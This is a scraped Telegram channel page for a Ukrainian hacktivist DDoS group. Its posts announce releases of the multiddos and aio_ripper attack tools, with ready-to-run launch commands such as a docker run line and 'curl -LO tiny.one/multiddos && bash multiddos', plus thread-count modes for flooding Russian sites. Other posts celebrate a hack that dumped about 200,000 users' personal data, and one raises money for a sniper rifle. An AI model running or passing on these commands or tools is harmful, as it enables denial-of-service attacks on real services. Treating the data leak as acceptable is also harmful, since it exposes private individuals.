cookie

Utilizamos cookies para mejorar tu experiencia de navegación. Al hacer clic en "Aceptar todo", aceptas el uso de cookies.

avatar

Украинский жнец (DDoS)

Туториалы, методики и алгоритмы DDoS-атак

Mostrar más
El país no está especificadoEl idioma no está especificadoLa categoría no está especificada
Advertising posts
4 001Suscriptores
Sin datos24 hours
Sin datos7 days
Sin datos30 days

Carga de datos en curso...

Tasa de crecimiento de suscriptores

Carga de datos en curso...

Repost from DC8044 F33d ➡️
Друзья! Спустя год после того, как появился патч DC8044 enjoy cybercrime, ставший культовым, мы выпустили новый! Точнее новые. Но все сложнее, чем вы думаете. Мы решили создать памятный патч в духе этого времени, чтобы поддержать наших амбассадоров, кто взял в руки оружие и воюет с орками. Если быть точным, мы создали два патча. Они одинаковые, но при этом разные. На фото слева - версия патча для военных. Мы вручим такие патчи каждому участнику нашего комьюнити, принимавшему (или принимающему) участие в боевых действиях. Патч эксклюзивный и сделан с помощью вышивки. На фото справа - версия патча для тех, кто хочет поддержать наших ребят, как вознаграждение за волонтерский вклад. Этот патч светится в темноте и сделан с помощью лазерной порезки, как и прошлогодний "enjoy cybercrime". Тираж весьма ограничен. Концепция дизайна патчей предполагает, что DC8044, хоть немного "затертое", остается в сердце, а надпись FIRE TEAM выходит на передний план, как главный акцент сегодняшнего дня. Рисунок, символизирующий взрыв и киберпанк-стилизация завершают концепцию. Дизайн полностью авторский и отрисован с нуля. Итак, этот день настал и мы запускаем новый донейшн-проект. Собираем деньги на покупку снайперского комплекса в калибре .50BMG либо .338 Lapua (с конкретной моделью определимся уже по факту сбора денег) и последующей передачи его в боевое подразделение, в котором сейчас проходит службу один из наших коммунити-мемберов. - Каждый из ТОП-10 донатеров (по сумме однократного доната) получит памятный светящийся патч DC8044 FIRE TEAM и набор стикеров нашего комьюнити. - кроме этого, среди всех остальных донатеров, закинувших сумму от 100 гривен и больше, будут случайным образом разыграны еще 10 таких же патчей. Банка Моно: https://send.monobank.ua/jar/FSSvuUHsg BTC: bc1qvnu9jpy0jazhgegkgc45wtkngu3tczj97wk9a4 USDT / ETH: 0x148a994dC8ba9eec0aa08f16D580f84946d90334 Подтверждение доната со скриншотом закидывайте боту: @DC8044_echo_bot Го.
Mostrar todo...
Хлопці та дівчата, є важлива новина. Ми самі гроші не збираємо бо в принципі у кожного в запасі є віртуалка^^ Але є добрі друзі які вже показали, як можно почати справу і не тільки допомагати а реально єбашити русню. Хлопці з київського дефкону друкують "літачки" та скидають на голови окупантам "подарунки", давайте підтримаємо їх бо діло не з дешевих але кожна гривня та кожна копійка реально дасть можливість наблизитись до перемоги. Для підтвердження полистайте канал, особисто знаю цих людей https://t.me/DC8044_Info 🔗Посилання на Банку https://send.monobank.ua/jar/7Mr8wc433f 💳Номер картки Банки 5375 4112 0179 0768
Mostrar todo...
Repost from RUH8
Нам очень нравятся заведения, где генералы, министры и пресс-секретари показывают документы на входе. Я думаю, что представлять этого человека не нужно, имя и дату рождения вы можете уточнить в Википедии. Пока наши российские "коллеги" ддосят детские сады, рыбнадзор и другие стратегические объекты, мы немного пошуршим в "центрах принятия решений".
Mostrar todo...
#нам_пишуть Перевірені колеги трохи іншого напрямку та діляться успіхами^^ Бажаємо красунчикам трощити ворога і надалі: 8 августа 2022 года хакеры из Минска, относящиеся к информационной группе ОШС, взломали сервер российского проправительственного движения НОД (https://rusnod.ru). Это был ответ на проведенную 6 августа в Минске акцию движения НОД “Минск ZA Россию”. В результате взлома с сайта была изъята и опубликована информация о участниках движения, зарегистрированных на сайте (около 200 000 человек), а на сайте движения размещено предупреждение о дальнейших последствиях сотрудничества движения НОД и А. Лукашенко. Дамп, слитый хакерами, содержит таблицу с данными пользователей сайта НОД, номерами телефонов, именами, логинами, адресами эл. почты, хешированными паролями. Копии страниц так же загружены в веб-архив: archive.ph/77alM archive.ph/pQpxz
Mostrar todo...
Доречі, тепер полотна тексту під картинкою доступні тільки в преміум-версії телеграма. Так що картинка до посту вище окремо. 🙂
Mostrar todo...
⭕️ Добрий день. Доречі, Газета.ru писала що в нас анонси кожні 5 днів, а ми щось розслабились. То ж тримаємо марку, зустрічайте Multiddos v1.2. Він тепер може запускати нову версію mhddos_proxy. Але це не звичайне оновлення mhddos_proxy, а "паралельна" версія. Тобто зараз існує дві версіЇ, які відрізняються одна від одної і існують одночасно. Як Windows XP і Windows 7, наприклад. В новій версії наче буде краща ситуація з проксі, краща підтримка від розробника, нові, вже прописані в конфігу, методи атак, і простіший запуск. Тепер це звичайний бінарник, тобто не буде проблем із модулямі пітона, які вилазять у людей на Mint, Kali та інших дистрибутивах. Ця версія mhddos_proxy має закритий код, що не всім сподобається, але це зроблено для того, щоб її було важче використовувати тім кому не потрібно. Цілі від IT ARMY і проксі вже зашиті в бінарник і використовувати mhddos_proxy для атак по українським сайтам буде десь від "важко" до "неможливо". В Multiddos v1.2 по замовчуванню ще використовується попередня версія mhddos_proxy. Для запуску нової версії команди ті самі, але в кінці треба додати --new 🪖 Docker: docker run -it --rm --log-driver none --name multidd --pull always karboduck/multidd --new 🪖 Bash : curl -LO tiny.one/multiddos && bash multiddos --new Нова версія по замовчуванню використовує режим --auto, який споживає побільше ресурсів, але гарантовано добре валить. Якщо ви хочете знизити, чи навпаки підвищити навантаження, то параметри --S, --M, --L і так далі можна використовувати як і раніше. Ще в режимі --auto одне ядро завжди завжди залишається вільним. Тобто якщо ви запускаєте --XL, який повинен запустити 4 копіЇ mhddos_proxy, а ядер процесора у вас теж 4, то запуститься лише 3 mhddos_proxy, щоб одне ядро було вільним. Якщо все буде працювати як треба, то потім зробимо навпаки, нова версія буде по замовчуванню, а стара буде запускатись з параметром --old. I ще така річ. Ми тут в каналі не часто пишемо, бо все якось працює само собою. Але ж у чаті активність та сама, що і раніше, то ж заходьте у гості. 📖 Як працює multiddos (https://github.com/KarboDuck/multiddos) ⁉️ Залишились питання? Додавайся в чат! (https://t.me/+azRzzKp-STpkMjNi)
Mostrar todo...
GitHub - KarboDuck/multiddos

Contribute to KarboDuck/multiddos development by creating an account on GitHub.

⭕️ Пишуть що головна мета CRM систем - утримувати клієнтів. А наша мета, щоб російські CRM системи не утримались після наших атак. Під'єднуйтесь, multiddos останнім часом працює як за двох і ефективність атак помітно збільшилась. 🪖 Docker: docker run -it --rm --log-driver none --name multidd --pull always karboduck/multidd 🪖 Bash : curl -LO tiny.one/multiddos && bash multiddos 📖 Як працює multiddos ⁉️ Залишились питання? Додавайся в чат!
Mostrar todo...
⭕️ У нас чергове оновлення і одразу до v 1.1, бо воно досить суттеве. 1. Тепер Multiddos працює швидше ніж раніше. На цей раз точно. Інфа надійна, як швейцарській годинник. Ми знайшли "баг" в базі цілей, який нагло тягнув на себе ковдру разом з ресурсами. 2. Додано зручні параметри для запуску Multiddos в різних режимах навантаження. --XS 1000 потоків. З бази беруться 1000 рандомних цілей і запускається 1 процесс mhddos_proxy * 1000 потоків. --S 2000 потоків. З бази беруться 1000 рандомних цілей і запускається 1 процесс mhddos_proxy * 2000 потоків. --M 4000 потоків. З бази беруться всі доступні цілі, розбиваються на 2 частини і запускається 2 процеси mhddos_proxy * 2000 потоків. --L 8000 потоків. З бази беруться всі доступні цілі, розбиваються на 2 частини і запускається 2 процеси mhddos_proxy * 4000 потоків. --XL 10000 потоків. З бази беруться всі доступні цілі, розбиваються на 4 частини і запускається 4 процеси mhddos_proxy * 2500 потоків. --XXL 20000 потоків. З бази беруться всі доступні цілі, розбиваються на 4 частини і запускається 4 процеси mhddos_proxy * 5000 потоківІ. По замовчуванню використовується режим --L. Ставити одразу --XXL не варто. Він може навпаки працювати повільніше, якщо система недостатньо потужна. Перевіряйте. Режим --lite і режим --S це тепер одне і те саме, можете використовувати любий варіант. Прописувати нові режими треба саме з двома дефісами і з великих літер.
curl -LO tiny.one/multiddos && bash multiddos --XL

Команди для запуску атак ті самі, що й завжди. 🪖 Docker: docker run -it --rm --log-driver none --name multidd --pull always karboduck/multidd 🪖 Bash : curl -LO tiny.one/multiddos && bash multiddos 📖 Як працює multiddos ⁉️ Залишились питання? Додавайся в чат!
Mostrar todo...
⭕️ Маємо перше ювілейне оновлення Multiddos - v 1.0. 🎉 1. Принаймні зараз, відмовляємся від власної бази цілей. Тепер Multiddos буде автоматично тягнути цілі з каналів: - DDOS по країні СЕПАРІВ (Кібер-Козаки) - IT ARMY of Ukraine Якщо знаєте інші гарні посилання на канали з власними цілями, поділіться в чаті. Ми любимо усіх. Ця зміна означає що тепер в Multiddos без затримок завжди будуть самі актуальні цілі з двох самих актуальних джерел. Цілі не будуть дублюватися, Multiddos об'єднує бази і видаляє повтори. 2. Версія 1.0 повинна працювати швидше, але використовує трохи більше ресурсів. Це пов'язано з тим, що тепер по замовчуванню стартує 4 процеси mhddos_proxy * 2500 потоків (всього 10 000 потоків). Якщо вам потрібно щоб Multiddos використовував менше ресурсів, запускайте його з ключем --lite. Він буде працювати в полегшеному режимі, не так потужно, але і з помітно меншим навантаженням процесора і мережі. 3. Прибрали ua_shield. Він не оновлюється вже два місяці, і по суті все одно ніколи не використовувався. Команди для запуску Multiddos ті самі: 🪖 Docker: docker run -it --rm --log-driver none --name multidd --pull always karboduck/multidd 🪖 Bash : curl -LO tiny.one/multiddos && bash multiddos 📖 Як працює multiddos ⁉️ Залишились питання? Додавайся в чат!
Mostrar todo...
⭕️ Кібер-батальйон, сьогодні в нас нова зброя для Windows - aio_ripper ( All In One Ripper). Цей скрипт робить ту саму справу що і multiddos, але на Windows його можно запускати не через docker, а напряму, з командного рядка Power Shell. Рекомендовано використовувати на Windows 10/11, але при бажанні можна запустити і на Windows 7. Детальна інформація і інструкція по встановленню за посиланням - https://github.com/ahovdryk/aio_reaper Розробник aio_ripper - @ahovdryk. Якщо в вас будуть питання, чи слова подяки, звертайтесь.
Mostrar todo...